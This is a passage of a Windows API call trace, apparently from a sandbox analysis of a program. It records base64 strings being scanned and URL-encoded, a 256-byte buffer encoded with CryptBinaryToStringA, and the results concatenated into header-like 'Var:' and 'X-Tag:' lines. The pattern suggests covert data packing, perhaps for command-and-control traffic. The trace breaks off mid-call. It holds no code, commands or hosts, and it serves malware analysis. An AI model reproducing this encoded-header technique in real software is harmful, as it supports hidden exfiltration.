(lpStr="O9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 49 [0143.806] StrSpnA (psz="+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0143.806] StrCSpnA (lpStr="w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 9 [0143.807] StrSpnA (psz="/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0143.807] StrCSpnA (lpStr="An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 30 [0143.807] StrSpnA (psz="/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0144.192] StrCSpnA (lpStr="aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 56 [0144.193] StrSpnA (psz="/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0144.193] StrCSpnA (lpStr="wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 52 [0144.193] StrSpnA (psz="/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0144.193] StrCSpnA (lpStr="1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 30 [0144.193] StrSpnA (psz="/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0144.193] StrCSpnA (lpStr="uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 13 [0144.193] StrSpnA (psz="/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0144.193] StrCSpnA (lpStr="QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 61 [0144.193] StrSpnA (psz="==", pszSet="+/=") returned 2 [0144.193] lstrlenA (lpString="loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D") returned 366 [0144.193] lstrcatA (in: lpString1="", lpString2="Var" | out: lpString1="Var") returned="Var" [0144.193] lstrcatA (in: lpString1="Var", lpString2=": " | out: lpString1="Var: ") returned="Var: " [0144.193] lstrcatA (in: lpString1="Var: ", lpString2="loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D" [0144.193] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D", lpString2="\r\n" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\n") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\n" [0144.193] GetProcessHeap () returned 0x440000 [0144.193] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0144.193] GetProcessHeap () returned 0x440000 [0144.193] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caed20 | out: hHeap=0x440000) returned 1 [0144.194] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0144.194] CryptBinaryToStringA (in: pbBinary=0x2caf5f0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x0, pcchString=0x14f68c | out: pszString=0x0, pcchString=0x14f68c) returned 1 [0144.194] GetProcessHeap () returned 0x440000 [0144.194] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x159) returned 0x2caed20 [0144.194] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0144.194] CryptBinaryToStringA (in: pbBinary=0x2caf5f0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x2caed20, pcchString=0x14f68c | out: pszString="+RXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh+HXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pcchString=0x14f68c) returned 1 [0144.194] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0144.194] lstrlenA (lpString="+RXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh+HXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==") returned 344 [0144.194] GetProcessHeap () returned 0x440000 [0144.194] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16d) returned 0x2ca9e30 [0144.194] StrCSpnA (lpStr="+RXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh+HXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 0 [0144.194] StrSpnA (psz="+RXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh+HXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.194] StrCSpnA (lpStr="RXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh+HXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 97 [0144.194] StrSpnA (psz="+HXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.194] StrCSpnA (lpStr="HXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 39 [0144.194] StrSpnA (psz="+h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.194] StrCSpnA (lpStr="h2UPduNwit1GPyBD/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 16 [0144.195] StrSpnA (psz="/JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.195] StrCSpnA (lpStr="JM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 50 [0144.195] StrSpnA (psz="/H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.195] StrCSpnA (lpStr="H22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 51 [0144.195] StrSpnA (psz="+1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.195] StrCSpnA (lpStr="1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 41 [0144.195] StrSpnA (psz="/gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.195] StrCSpnA (lpStr="gtkZf9x42yo1jdInGBwYfj+VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 22 [0144.195] StrSpnA (psz="+VtHaMSFxhk0nTWooJA==", pszSet="+/=") returned 1 [0144.195] StrCSpnA (lpStr="VtHaMSFxhk0nTWooJA==", lpSet="+/=") returned 18 [0144.195] StrSpnA (psz="==", pszSet="+/=") returned 2 [0144.195] lstrlenA (lpString="%2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D") returned 364 [0144.195] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\n", lpString2="X-Tag" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag" [0144.195] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag", lpString2=": " | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: ") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: " [0144.195] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: ", lpString2="%2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D" [0144.195] lstrcatA (in: lpString1="Var: 